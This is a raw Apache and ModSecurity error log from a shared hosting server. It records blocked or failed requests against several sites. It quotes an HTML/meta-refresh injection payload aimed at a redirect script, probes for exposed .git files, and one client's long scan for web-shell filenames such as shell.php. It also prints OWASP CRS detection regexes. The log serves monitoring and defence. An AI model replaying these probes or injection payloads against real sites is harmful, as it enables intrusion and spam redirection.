[Tue May 12 06:19:25.509456 2026] [security2:error] [pid 1825287:tid 1825324] [client 27.78.84.116:64130] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [ta [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqTQgpmE1yW0glLdg9XAAAANM"]
[Tue May 12 06:19:25.509624 2026] [security2:error] [pid 1825287:tid 1825324] [client 27.78.84.116:64130] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqTQgpmE1yW0glLdg9XAAAANM"]
[Tue May 12 06:19:25.510068 2026] [security2:error] [pid 1825287:tid 1825324] [client 27.78.84.116:64130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqTQgpmE1yW0glLdg9XAAAANM"]
[Tue May 12 06:19:25.510374 2026] [security2:error] [pid 1825287:tid 1825324] [client 27.78.84.116:64130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqTQgpmE1yW0glLdg9XAAAANM"]
[Tue May 12 06:19:29.422017 2026] [security2:error] [pid 1808852:tid 1808865] [client 54.91.164.107:46682] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecorporatefinance.fr"] [uri "/.git/config"] [unique_id "agKqURfeipD4uoG21FpBkAAAAAo"]
[Tue May 12 06:19:29.422237 2026] [security2:error] [pid 1808852:tid 1808865] [client 54.91.164.107:46682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecorporatefinance.fr"] [uri "/.git/config"] [unique_id "agKqURfeipD4uoG21FpBkAAAAAo"]
[Tue May 12 06:19:30.212935 2026] [security2:error] [pid 1808852:tid 1808865] [client 54.91.164.107:46682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecorporatefinance.fr"] [uri "/index.php"] [unique_id "agKqURfeipD4uoG21FpBkAAAAAo"]
[Tue May 12 06:19:43.875459 2026] [:error] [pid 1825287:tid 1825315] [client 18.215.169.92:18740] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:19:54.654607 2026] [security2:error] [pid 1825287:tid 1825304] [client 144.76.32.114:35670] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: b93e2539f7c9dea6f4db095ac9296830||1778561393||1778561033"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-content/uploads/2017/06/Depositphotos_65899635_original.jpg"] [unique_id "agKqaggpmE1yW0glLdg9bgAAAMA"]
[Tue May 12 06:19:54.654842 2026] [security2:error] [pid 1825287:tid 1825304] [client 144.76.32.114:35670] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-content/uploads/2017/06/Depositphotos_65899635_original.jpg"] [unique_id "agKqaggpmE1yW0glLdg9bgAAAMA"]
[Tue May 12 06:19:55.239024 2026] [security2:error] [pid 1825287:tid 1825304] [client 144.76.32.114:35670] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKqaggpmE1yW0glLdg9bgAAAMA"]
[Tue May 12 06:20:06.491948 2026] [cgid:error] [pid 1820198:tid 1820221] [client 5.135.131.226:40576] Script timed out before returning headers: ea-php74
[Tue May 12 06:20:15.201210 2026] [security2:error] [pid 1825287:tid 1825317] [client 43.166.244.66:52452] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/badinerie/"] [unique_id "agKqfwgpmE1yW0glLdg9ewAAAMw"]
[Tue May 12 06:20:19.604440 2026] [security2:error] [pid 1842385:tid 1842395] [client 43.157.22.57:52084] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKqgxs7kySIUZ3ORnI3BQAAAQU"]
[Tue May 12 06:21:04.710055 2026] [security2:error] [pid 1808852:tid 1808874] [client 43.167.232.38:53132] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agKqsBfeipD4uoG21FpCOgAAABM"]
[Tue May 12 06:21:08.203454 2026] [proxy_fcgi:error] [pid 1808852:tid 1808875] [client 134.209.116.34:54005] AH01071: Got error 'Primary script unknown'
[Tue May 12 06:22:16.074726 2026] [security2:error] [pid 1820198:tid 1820219] [client 45.130.203.214:24775] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agKq-M1tk6y7yBJLpJpHMAAAAJM"]
[Tue May 12 06:22:16.074986 2026] [security2:error] [pid 1820198:tid 1820219] [client 45.130.203.214:24775] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agKq-M1tk6y7yBJLpJpHMAAAAJM"]
[Tue May 12 06:22:16.075222 2026] [security2:error] [pid 1820198:tid 1820219] [client 45.130.203.214:24775] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agKq-M1tk6y7yBJLpJpHMAAAAJM"]
[Tue May 12 06:22:28.964804 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/0x.php
[Tue May 12 06:22:29.060553 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/xenon1337.php
[Tue May 12 06:22:29.156217 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/mac.php
[Tue May 12 06:22:29.254273 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/hayuk.php
[Tue May 12 06:22:29.349832 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/0d.php
[Tue May 12 06:22:29.450291 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/wefile.php
[Tue May 12 06:22:29.545924 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/casp3.php
[Tue May 12 06:22:29.653558 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/birlingsless.php
[Tue May 12 06:22:29.750444 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/unvouc.php
[Tue May 12 06:22:29.846770 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/wp-signin.php
[Tue May 12 06:22:30.135205 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/wp-links.php
[Tue May 12 06:22:30.422173 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/half.php
[Tue May 12 06:22:30.520220 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/2P.php
[Tue May 12 06:22:30.615785 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/tires.php
[Tue May 12 06:22:30.711864 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/aevly.php
[Tue May 12 06:22:30.903986 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/wp-block.php
[Tue May 12 06:22:30.999462 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/like.php
[Tue May 12 06:22:31.095398 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/kj.php
[Tue May 12 06:22:31.191175 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/.well-known/about.php
[Tue May 12 06:22:31.384479 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/wpxml.php
[Tue May 12 06:22:31.480031 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/bob.php
[Tue May 12 06:22:31.575594 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/spawns.php
[Tue May 12 06:22:31.695705 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/t3s.php
[Tue May 12 06:22:31.922738 2026] [security2:error] [pid 1808852:tid 1808873] [client 43.153.27.244:53224] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/index2.php"] [unique_id "agKrBxfeipD4uoG21FpC7AAAABI"]
[Tue May 12 06:22:31.923488 2026] [:error] [pid 1808852:tid 1808873] [client 43.153.27.244:53224] File does not exist: /home/ofcrysta/public_html/index2.php
[Tue May 12 06:22:32.121549 2026] [security2:error] [pid 1825287:tid 1825326] [client 170.106.167.214:40698] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/category/informatique/intelligence-artificielle/gpt/"] [unique_id "agKrCAgpmE1yW0glLdg-FgAAANQ"]
[Tue May 12 06:22:32.174008 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/uwu.php
[Tue May 12 06:22:32.269737 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/uwa.php
[Tue May 12 06:22:32.365531 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/crgio.php
[Tue May 12 06:22:32.463094 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/geforce.php
[Tue May 12 06:22:32.558789 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/wp-load.php
[Tue May 12 06:22:32.654592 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/3PJcpMFsD8B.php
[Tue May 12 06:22:32.750197 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/.sghb.php
[Tue May 12 06:22:32.847886 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/zoko.php
[Tue May 12 06:22:32.945466 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/bgymj.php
[Tue May 12 06:22:33.041654 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/pucci.php
[Tue May 12 06:22:33.522055 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/one.php
[Tue May 12 06:22:33.618157 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/sl.php
[Tue May 12 06:22:33.714248 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/wp-temp.php
[Tue May 12 06:22:33.906617 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/xmu.php
[Tue May 12 06:22:34.002621 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/mode.php
[Tue May 12 06:22:34.194574 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/dx.php
[Tue May 12 06:22:34.290711 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/puc.php
[Tue May 12 06:22:34.386836 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/themes.php
[Tue May 12 06:22:34.482971 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/dx.php
[Tue May 12 06:22:34.578768 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/awa.php
[Tue May 12 06:22:34.676289 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/11.php
[Tue May 12 06:22:34.772366 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/p.php
[Tue May 12 06:22:34.964495 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/bthil.php
[Tue May 12 06:22:35.061167 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/shell.php
[Tue May 12 06:22:35.157724 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/seo.php
[Tue May 12 06:22:35.254849 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/7.php
[Tue May 12 06:22:35.351005 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/8.php
[Tue May 12 06:22:35.447035 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/1.php
[Tue May 12 06:22:35.543082 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/class.php
[Tue May 12 06:22:35.639121 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/100.php
[Tue May 12 06:22:35.735227 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/2026w.php
[Tue May 12 06:22:35.831743 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/about.php
[Tue May 12 06:22:35.927683 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/xa.php
[Tue May 12 06:22:36.023851 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/admin.php
[Tue May 12 06:22:36.123024 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/w2025.php
[Tue May 12 06:22:36.219239 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/fvvff.php
[Tue May 12 06:22:36.315493 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/edit.php
[Tue May 12 06:22:36.323273 2026] [security2:error] [pid 1844863:tid 1844870] [client 43.157.153.236:53358] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.homin.fr"] [uri "/"] [unique_id "agKrDPaAnTZtx1_H_wzIAQAAAUE"]
[Tue May 12 06:22:36.411701 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/admin.php
[Tue May 12 06:22:36.603668 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/f6.php
[Tue May 12 06:22:36.699671 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/inputs.php
[Tue May 12 06:22:36.795611 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/av.php
[Tue May 12 06:22:36.988977 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/wp-act.php
[Tue May 12 06:22:37.085232 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/classwithtostring.php
[Tue May 12 06:22:37.288247 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/wp-blog.php
[Tue May 12 06:22:37.577601 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/adminfuns.php
[Tue May 12 06:22:37.673607 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/goods.php
[Tue May 12 06:22:37.773131 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/ms-edit.php
[Tue May 12 06:22:37.869180 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/222.php
[Tue May 12 06:22:38.161051 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/BDKR28WP.php
[Tue May 12 06:22:38.450855 2026] [:error] [pid 1825179:tid 1825219] [client 52.138.31.126:55333] File does not exist: /var/www/html/wp.php
[Tue May 12 06:22:38.745513 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/av.php
[Tue May 12 06:22:38.840932 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/abcd.php
[Tue May 12 06:22:38.936166 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/a1.php
[Tue May 12 06:22:39.249076 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/f35.php
[Tue May 12 06:22:39.442641 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/bal.php
[Tue May 12 06:22:39.736607 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/gettest.php
[Tue May 12 06:22:40.021947 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/simple.php
[Tue May 12 06:22:40.117155 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/buy.php
[Tue May 12 06:22:40.212339 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/xxx.php
[Tue May 12 06:22:40.307539 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/hypo.php
[Tue May 12 06:22:40.497926 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/chosen.php
[Tue May 12 06:22:40.688519 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/00.php
[Tue May 12 06:22:40.783611 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/als.php
